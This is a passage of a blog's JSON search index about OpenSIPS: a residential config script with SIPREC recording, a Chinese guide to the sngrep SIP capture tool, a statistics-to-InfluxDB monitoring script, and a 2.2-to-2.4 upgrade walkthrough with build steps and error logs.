\u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, 
\u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;b2b_entities.so\u0026#34; loadmodule \u0026#34;siprec.so\u0026#34; loadmodule \u0026#34;rtpproxy.so\u0026#34; modparam(\u0026#34;rtpproxy\u0026#34;, \u0026#34;rtpproxy_sock\u0026#34;, \u0026#34;udp:127.0.0.1:7899\u0026#34;) ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. 
sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); rtpproxy_engage(); siprec_start_recording(\u0026#34;sip:127.0.0.1:5090\u0026#34;); do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { 
t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/siprec/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.","title":"siprec"},{"content":"1. 安装 1.1. centos vim /etc/yum.repos.d/irontec.repo\n[irontec] name=Irontec RPMs repository baseurl=http://packages.irontec.com/centos/$releasever/$basearch/ rpm --import http://packages.irontec.com/public.key\nyum install sngrep\n1.2 debian/ubuntu # debian 安装sngrep echo \u0026#34;deb http://packages.irontec.com/debian jessie main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list wget http://packages.irontec.com/public.key -q -O - | apt-key add - apt-get install sngrep -y debian buster 即 debian10以上可以直接 apt-get install sngrep 1.3 arch/manjaro yay -Syu sngrep 参考: https://aur.archlinux.org/packages/sngrep/\n如果报错,编辑 /etc/makepkg.conf文件,删除其中的-Werror=format-security\nCFLAGS=\u0026#34;-march=x86-64 -mtune=generic -O2 -pipe -fno-plt -fexceptions \\ -Wp,-D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security \\ -fstack-clash-protection -fcf-protection\u0026#34; 2.
命令行参数 sngrep [-hVcivNqrD] [-IO pcap_dump] [-d dev] [-l limit] [-k keyfile] [-LH capture_url] [\u0026lt;match expression\u0026gt;] [\u0026lt;bpf filter\u0026gt;] -h --help: 显示帮助信息 -V --version: 显示版本信息 -d --device: 指定抓包的网卡 -I --input: 从pcap文件中解析sip包 -O --output: 输出捕获的包到pcap文件中 -c --calls: 仅显示invite消息 -r --rtp: Capture RTP packets payload 捕获rtp包 -l --limit: 限制捕获对话的数量 -i --icase: 使大小写不敏感 -v --invert: 反转匹配(类似grep -v,只显示不匹配的对话) -N --no-interface: Don\u0026rsquo;t display sngrep interface, just capture -q --quiet: Don\u0026rsquo;t print captured dialogs in no interface mode -D --dump-config: Print active configuration settings and exit -f --config: Read configuration from file -R --rotate: Rotate calls when capture limit have been reached. -H --eep-send: Homer sipcapture url (udp:X.X.X.X:XXXX) -L --eep-listen: Listen for encapsulated packets (udp:X.X.X.X:XXXX) -k --keyfile: RSA private keyfile to decrypt captured packets 3. 页面 sngrep有四个页面,每个页面都有一些不同的快捷键。\n呼叫列表页面 呼叫流程页面 原始呼叫信息页面 信息对比页面 3.1 呼叫列表页面 快捷键\nArrow keys: Move through the list,除了上下箭头还可以使用j,k来移动光标 Enter: Display current or selected dialog(s) message flow A: Auto scroll to new calls,自动滚动到新的call F2 or s: Save selected/all dialog(s) to a PCAP file, 保存dialog到pcap文件 F3 or / or TAB: Enter a display filter. This filter will be applied to the text lines in the list,进入搜索 F4 or x: Display current selected dialog and its related one. 
回到第一个sip消息上 F5: Clear call list, 清空呼叫列表 F6 or r: Display selected dialog(s) messages in raw text, 显示原始的sip消息 F7 or f: Show advanced filters dialogs 显示高级过滤弹窗 F9 or l: Turn on/off address resolution if enabled F10 or t: Select displayed columns, 显示或者隐藏侧边sip消息栏 呼叫列表页面还能够显示两个弹窗, 按f可以显示高级过滤配置\n按t可以显示, 自定义呼叫列选项弹窗\n3.2 呼叫流程页面 快捷键\nKeybindings:\nArrow keys: Move through messages Enter: Display current message raw (so you can copy payload) F2 or d: 显示sdp消息,f2的某个模式会让时序图更紧凑 F3 or t: 显示或者关闭sip侧边栏 F4 or x: 回到顶部 F5 or s: 每个ip地址仅仅显示一列 F6 or R: 显示原始的sip消息 F7 or c: 改变颜色模式, 有的颜色模式很容易让人无法区分当前查看的sip消息是哪一个,所以需要改变颜色模式 F9 or l: Turn on/off address resolution if enabled 9 and 0: 增加或者减少侧边栏的宽度 T: 重绘侧边栏 D: 仅显示带有sdp的消息 空格键:选中一个sip消息,再选中另一个sip消息,然后就会进入对比模式 F1 or h: 显示帮助信息页面 3.3 原始sip消息界面 3.4 消息对比界面 在呼叫列表页面按空格键选中一个消息,然后选择另外一个sip消息后,再次按空格键,就可以进入消息对比页面\n4. 分析媒体问题 使用 sngrep -r 可以用来捕获媒体流,默认不加 -r 则只能显示信令。\n在呼叫流程页面,按下F3, 可以动态地查看媒体流的情况。在分析语音问题时,这是非常方便的分析工具。 5. 扩展技法 5.1 无界面模式 假如有个很大的抓包文件,比如说有1.5G吧,如果用wireshark直接打开,有可能wireshark直接卡死,也有可能在搜索的时候就崩溃了。\n即使用sngrep来直接读取pcap文件,也可能会非常慢。\n假如我们只想从这1.5G文件中找到号码中包含1234的呼叫,应该怎么处理呢?\n用下面的命令就可以:\nsngrep -rI test.pcap 1234 -N -O dst.pcap Dialog count: 17 -r 读取语音流 -I 从pcap文件中读取 -N 不要界面 -O 将匹配的结果写到其他文件中 经过上面的命令,一个很大的pcap文件,在处理之后,就会变成我们关心的小的包文件,比较容易处理了。\n5.2 个性化配置 在呼叫列表界面,按F8可以进入到个性化配置界面,如下:\n个性化配置页面有三个Tab页面, 三个页面可以用翻页的pageUp, pageDown来切换。在macbook上可能没有翻页键,那你要用fn + 上下方向键 来翻页\nInterface Capture Call Flow 在每个页面可以用上下键来选择不同的设置项,按左右键改变对应的值。也可以按空格键来改变对应的值。\n在每个Tab页面,可以按Tab键在设置项和下面的Accept和Save、Cancel之间切换。\n我们的个性化配置可以用Save来保存下来,不然每次都要再设置一遍。\n1. interface 页面 2. Capture设置界面 配置抓包相关的信息,例如最大抓包的数量,网卡设备,是否启用事务,默认的保存文件路径等等。 3. Call Flow页面 这个页面用来设置呼叫时序图页面。就不再过多介绍。\n我用的比较多的,可能是Merge columns with same address。 sngrep默认用IP:PORT作为时序图中的一个竖线。但是如果IP相同,端口号不同。sngrep就会划出很多竖线。启用了该项之后,就只会根据IP来划竖线。 区分IP和端口: Merge columns with same address on 表示只根据IP来划竖线 off 表示根据IP:PORT来划线,如果你想在竖线上能看到端口信息,则需要设置为off 如下图所示,Merge columns with same address: off 如何更容易区分当前是在哪一信令上? 
有时候移动得快一点,例如只能看到SIP消息是REGISTER, 但是具体是哪一个REGISTER, 看得眼疼也区分不出来。 这时候Call Flow中的Selected message highlight就派上用场。\nbold 加粗 reverse 反色 reversebold 反色并且加粗 一般情况下,reverse或者reversebold都能让你更好的区分,下面就是使用reverse模式下的时序图\n可以很明显的看到,第三个REGISTER的背景色变了一大块,所以当前就是在第三个REGISTER信令上。 6. sngrep使用注意点 不要长时间用sngrep抓包,否则sngrep会占用非常多的内存。如果必须抓一段时间的包,务必使用tcpdump。 某些情况下,sngrep会丢包 某些情况下,sngrep会什么包都抓不到,注意此时很可能要使用-d去指定抓包的网卡 sngrep只能捕获本机网卡收到和发送的流量。假如A、B、C分别是三台独立虚拟机的SIP服务器,在B上抓包只能分析A-B和B-C之间的流量。 再次强调:sngrep不适合长时间抓包,只适合短时间抓包分析问题。如果你需要记录所有的sip消息,并展示,可以考虑使用siphub,或者homer。 ","permalink":"https://wdd.js.org/opensips/tools/sngrep/","summary":"1. 安装 1.1. centos vim /etc/yum.repos.d/irontec.repo\n[irontec] name=Irontec RPMs repository baseurl=http://packages.irontec.com/centos/$releasever/$basearch/ rpm --import http://packages.irontec.com/public.key\nyum install sngrep\n1.2 debian/ubuntu # debian 安装sngrep echo \u0026#34;deb http://packages.irontec.com/debian jessie main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list wget http://packages.irontec.com/public.key -q -O - | apt-key add - apt-get install sngrep -y debian buster 即 debian10以上可以直接 apt-get install sngrep 1.3 arch/manjaro yay -Syu sngrep 参考: https://aur.archlinux.org/packages/sngrep/\n如果报错,编辑 /etc/makepkg.conf文件,删除其中的-Werror=format-security\nCFLAGS=\u0026#34;-march=x86-64 -mtune=generic -O2 -pipe -fno-plt -fexceptions \\ -Wp,-D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security \\ -fstack-clash-protection -fcf-protection\u0026#34; 2.","title":"sngrep: 最好用的sip可视化抓包工具"},{"content":"**opensipsctl fifo get_statistics all **命令可以获取所有统计数据,在所有统计数据中,我们只关心内存,事务和会话的数量。然后将数据使用curl工具写入到influxdb中。\nopensipsctl fifo reset_statistics all 重置统计数据\n常用指令 命令 描述 opensipsctl fifo which 显示所有可用命令 opensipsctl fifo ps 显示所有进程 opensipsctl fifo get_statistics all 获取所有统计信息 opensipsctl fifo get_statistics core: 获取内核统计信息 opensipsctl fifo get_statistics net: 获取网络统计信息 opensipsctl fifo get_statistics pkmem: 获取私有内存相关信息 opensipsctl fifo get_statistics tm: 获取事务模块统计信息 opensipsctl 
fifo get_statistics sl: 获取sl模块统计信息 opensipsctl fifo get_statistics shmem: 获取共享内存相关信息 opensipsctl fifo get_statistics usrloc: 获取用户位置统计信息 opensipsctl fifo get_statistics registrar: 获取注册统计信息 opensipsctl fifo get_statistics uri: 获取uri统计信息 opensipsctl fifo get_statistics load: 获取负载信息 opensipsctl fifo reset_statistics all 重置所有统计信息 shmem:total_size:: 6467616768 shmem:used_size:: 4578374040 shmem:real_used_size:: 4728909408 shmem:max_used_size:: 4728909408 shmem:free_size:: 1738707360 shmem:fragments:: 1 # 事务 tm:UAS_transactions:: 296337 tm:UAC_transactions:: 30 tm:2xx_transactions:: 174737 tm:3xx_transactions:: 0 tm:4xx_transactions:: 110571 tm:5xx_transactions:: 2170 tm:6xx_transactions:: 0 tm:inuse_transactions:: 289651 dialog:active_dialogs:: 156 dialog:early_dialogs:: 680 dialog:processed_dialogs:: 104061 dialog:expired_dialogs:: 964 dialog:failed_dialogs:: 78457 dialog:create_sent:: 0 dialog:update_sent:: 0 dialog:delete_sent:: 0 dialog:create_recv:: 0 dialog:update_recv:: 0 dialog:delete_recv:: 0 CONF_DB_URL=\u0026#34;ip:port\u0026#34; # influxdb地址 CONF_DB_NAME=\u0026#34;dbname\u0026#34; # influxdb数据库名 CONF_OPENSIPS_ROLE=\u0026#34;a\u0026#34; # 角色,随便写个字符串 PATH=\u0026#34;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin\u0026#34; LOCAL_IP=`ip route get 8.8.8.8 | head -n +1 | tr -s \u0026#34; \u0026#34; | cut -d \u0026#34; \u0026#34; -f 7` MSG=`opensipsctl fifo get_statistics all | grep -E \u0026#34;tm:|shmem:|dialog\u0026#34; | awk -F \u0026#39;:: \u0026#39; \u0026#39;BEGIN{OFS=\u0026#34;=\u0026#34;;ORS=\u0026#34;,\u0026#34;} {print $1,$2}\u0026#39; | sed \u0026#39;s/[-:.]/_/g\u0026#39;` MSG=${MSG:0:${#MSG}-1} echo $MSG influxdb=\u0026#34;http://$CONF_DB_URL/write?db=$CONF_DB_NAME\u0026#34; curl -i -XPOST $influxdb --data-binary \u0026#34;opensips,type=$CONF_OPENSIPS_ROLE,ip=$LOCAL_IP $MSG\u0026#34; shmem:total_size:: 33554432shmem:used_size:: 2910624shmem:real_used_size:: 3722856shmem:max_used_size:: 21963544shmem:free_size:: 29831576shmem:fragments:: 
30761core:rcv_requests:: 1625972core:rcv_replies:: 580098core:fwd_requests:: 26146core:fwd_replies:: 0core:drop_requests:: 27core:drop_replies:: 0core:err_requests:: 0core:err_replies:: 0core:bad_URIs_rcvd:: 0core:unsupported_methods:: 0core:bad_msg_hdr:: 0core:timestamp:: 179429net:waiting_udp:: 0net:waiting_tcp:: 0sl:1xx_replies:: 0sl:2xx_replies:: 930643sl:3xx_replies:: 0sl:4xx_replies:: 265459sl:5xx_replies:: 168472sl:6xx_replies:: 0sl:sent_replies:: 1364574sl:sent_err_replies:: 0sl:received_ACKs:: 27tm:received_replies:: 570374tm:relayed_replies:: 402332tm:local_replies:: 155868tm:UAS_transactions:: 181106tm:UAC_transactions:: 71770tm:2xx_transactions:: 117167tm:3xx_transactions:: 0tm:4xx_transactions:: 138052tm:5xx_transactions:: 29tm:6xx_transactions:: 0tm:inuse_transactions:: 2uri:positive checks:: 195024uri:negative_checks:: 0usrloc:registered_users:: 0usrloc:location-users:: 0usrloc:location-contacts:: 0usrloc:location-expires:: 0registrar:max_expires:: 180registrar:max_contacts:: 1registrar:default_expire:: 150registrar:accepted_regs:: 110781registrar:rejected_regs:: 84236dialog:active_dialogs:: 0dialog:early_dialogs:: 0dialog:processed_dialogs:: 150397dialog:expired_dialogs:: 0dialog:failed_dialogs:: 137297dialog:create_sent:: 0dialog:update_sent:: 0dialog:delete_sent:: 0dialog:create_recv:: 0dialog:update_recv:: 0dialog:delete_recv:: 0\n","permalink":"https://wdd.js.org/opensips/ch3/opensips-monitor/","summary":"**opensipsctl fifo get_statistics all **命令可以获取所有统计数据,在所有统计数据中,我们只关心内存,事务和回话的数量。然后将数据使用curl工具写入到influxdb中。\nopensipsctl fifo reset_statistics all 重置统计数据\n常用指令 命令 描述 opensipsctl fifo which 显示所有可用命令 opensipsctl fifo ps 显示所有进程 opensipsctl fifo get_statistics all 获取所有统计信息 opensipsctl fifo get_statistics core: 获取内核统计信息 opensipsctl fifo get_statistics net: 获取网路统计信息 opensipsctl fifo get_statistics pkmem: 获取私有内存相关信息 opensipsctl fifo get_statistics tm: 获取事务模块统计信息 opensipsctl fifo get_statistics sl: 获取sl模块统计信息 opensipsctl fifo get statistics shmem: 
获取共享内存相关信息 opensipsctl fifo get statistics usrloc: 获取 opensipsctl fifo get statistics registrar: 获取注册统计信息 opensipsctl fifo get statistics uri: 获取uri统计信息 opensipsctl fifo get statistics load: 获取负载信息 opensipsctl fifo reset_statistics all 重置所有统计信息 shmem:total_size:: 6467616768 shmem:used_size:: 4578374040 shmem:real_used_size:: 4728909408 shmem:max_used_size:: 4728909408 shmem:free_size:: 1738707360 shmem:fragments:: 1 # 事务 tm:UAS_transactions:: 296337 tm:UAC_transactions:: 30 tm:2xx_transactions:: 174737 tm:3xx_transactions:: 0 tm:4xx_transactions:: 110571 tm:5xx_transactions:: 2170 tm:6xx_transactions:: 0 tm:inuse_transactions:: 289651 dialog:active_dialogs:: 156 dialog:early_dialogs:: 680 dialog:processed_dialogs:: 104061 dialog:expired_dialogs:: 964 dialog:failed_dialogs:: 78457 dialog:create_sent:: 0 dialog:update_sent:: 0 dialog:delete_sent:: 0 dialog:create_recv:: 0 dialog:update_recv:: 0 dialog:delete_recv:: 0 CONF_DB_URL=\u0026#34;ip:port\u0026#34; # influxdb地址 CONF_DB_NAME=\u0026#34;dbname\u0026#34; # influxdb数据库名 CONF_OPENSIPS_ROLE=\u0026#34;a\u0026#34; # 角色,随便写个字符串 PATH=\u0026#34;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin\u0026#34; LOCAL_IP=`ip route get 8.","title":"opensips监控"},{"content":"环境声明 系统 centos7 已经安装opensips 2.2 需要升级目标 opensips 2.4.6 要求:当前系统上没有部署mysql服务端程序 升级步骤 升级分为两步\nopensips 应用升级,包括源码的下载,编译等等 opensips 数据库升级,使用opensipsdbctl工具迁移老的数据 Edge: opensips应用升级 升级过程以Makefile交付,可以先新建一个空的目录,如 /root/opensips-update/\n# file: /root/opensips-update/Makefile VERSION=2.4.6 download: wget https://opensips.org/pub/opensips/$(VERSION)/opensips-$(VERSION).tar.gz; tar -zxvf opensips-$(VERSION).tar.gz; build: cd opensips-$(VERSION); make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 make install include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 新建空目录/root/opensips-update/ 在新目录中创建名为 Makefile的文件, 内容如上面所示 执行 make download 执行 make build Core: opensips应用升级 make all -j4 
include_modules=\u0026#34;db_mysql httpd\u0026#34; make install include_modules=\u0026#34;db_mysql httpd\u0026#34; 可能遇到的报错以及解决方案 主要的问题可能是某些包冲突,或者某些库没有安装依赖。在解决问题后,需要重新编译。\n1. linux2.6.x86_64 conflicts with file from package .linux2.6.x86_64 conflicts with file from package MySQL-server-5.1.7-0.i386 file /usr/share/mysql/italian/errmsg.sys from install of MySQL-server-5.5.28-1.linux2.6.x86_64 conflicts with file from package MySQL-server-5.1.7-0.i386 file /usr/share/mysql/japanese/errmsg.sys from install of MySQL-server-5.5.28-\n解决方案:rpm -qa | grep mysql | xargs rpm -e --nodeps\n2. my_con.h:29:19: fatal error: mysql.h: No such file or directory my_con.h:29:19: fatal error: mysql.h: No such file or directory\n解决方案:yum install mysql-devel -y\n3. siprec_uuid.h:29:23: fatal error: uuid/uuid.h: No such file or directory ERROR3:\nsiprec_uuid.h:29:23: fatal error: uuid/uuid.h: No such file or directory #include \u0026lt;uuid/uuid.h\u0026gt;\n解决方案:yum install libuuid-devel -y\n4. regex.so: undefined symbol: debug 数据库迁移 opensips不同的版本,所需要的模块对应的表可能都不同,所以需要迁移数据库。\n迁移数据库需要opensipsdbctl命令,这个命令会根据opensipsctlrc文件连接opensips所使用的数据库。\nopensips的升级有个特点:新版本的opensipsdbctl只能用来升级之前版本的opensips。\n从官方文档可以看出 2.2版本的opensips要升级到2.4,中间需要经过2.3。也就是说,你需要用opensips 2.3中的opensipsdbctl将 2.2升级到2.3,然后使用opensips 2.4中的opensipsdbctl将 2.3升级到2.4。\n为了加快升级速度,避免安装不必要的版本,我构建了两个docker镜像,这两个镜像分别是2.3版本的opensips和2.4版本的opensips。我们可以使用这两个镜像中的opensipsdbctl来升级数据库。\ndocker pull ccr.ccs.tencentyun.com/wangdd/opensips-base:2.3.1 docker pull ccr.ccs.tencentyun.com/wangdd/opensips-base:2.4.2 先从2.2升级到2.3\ndocker run -it --name opensips --rm ccr.ccs.tencentyun.com/wangdd/opensips-base:2.3.1 bash vim /usr/local/etc/opensipsctlrc opensipsdbctl migrate opensips_old_db opensips_new_db # 下面会让你输入数据库密码, # 下面可能让你输入y/n, 一律输入y # 如果让你选择字符集,则输入 latin1 然后基于老的数据库,创建新的数据库。对于老的数据库,opensipsdbctl并不会改变它的任何字段。\n首先需要配置/usr/local/etc/opensips/opensipsctlrc文件,把mysql相关的配置修改正确。\n有可能升级过后opensips -V 输出的还是老版本的opensips, 这时需要\n排查PATH /usr/local/sbin/ 
是不是在 /usr/sbin的前面 重新连接shell, 有可能环境变量还未更新 可执行文件的位置 # 2.x版本的 /usr/local/sbin/ # 1.x 版本的 /usr/sbin 报错 Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/regex.so\u0026gt;: /usr/local/lib64/opensips/modules/regex.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 26, column 13-14: failed to load module regex.so Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/rest_client.so\u0026gt;: /usr/local/lib64/opensips/modules/rest_client.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 57, column 13-14: failed to load module rest_client.so Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;failed_transaction_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 99, column 20-21: Parameter \u0026lt;failed_transaction_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 101, column 20-21: Parameter \u0026lt;db_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_missed_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file 
/usr/local//etc/opensips/opensips.cfg, line 102, column 20-21: Parameter \u0026lt;db_missed_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;cdr_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 103, column 20-21: Parameter \u0026lt;cdr_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_extra\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 104, column 20-21: Parameter \u0026lt;db_extra\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/carrierroute.so\u0026gt;: /usr/local/lib64/opensips/modules/carrierroute.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 146, column 13-14: failed to load module carrierroute.so Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 147, column 20-21: Parameter \u0026lt;db_url\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 148, column 20-21: Parameter \u0026lt;config_source\u0026gt; not found in 
module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 149, column 19-20: Parameter \u0026lt;use_domain\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 150, column 20-21: Parameter \u0026lt;db_failure_table\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:23 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/dialplan.so\u0026gt;: 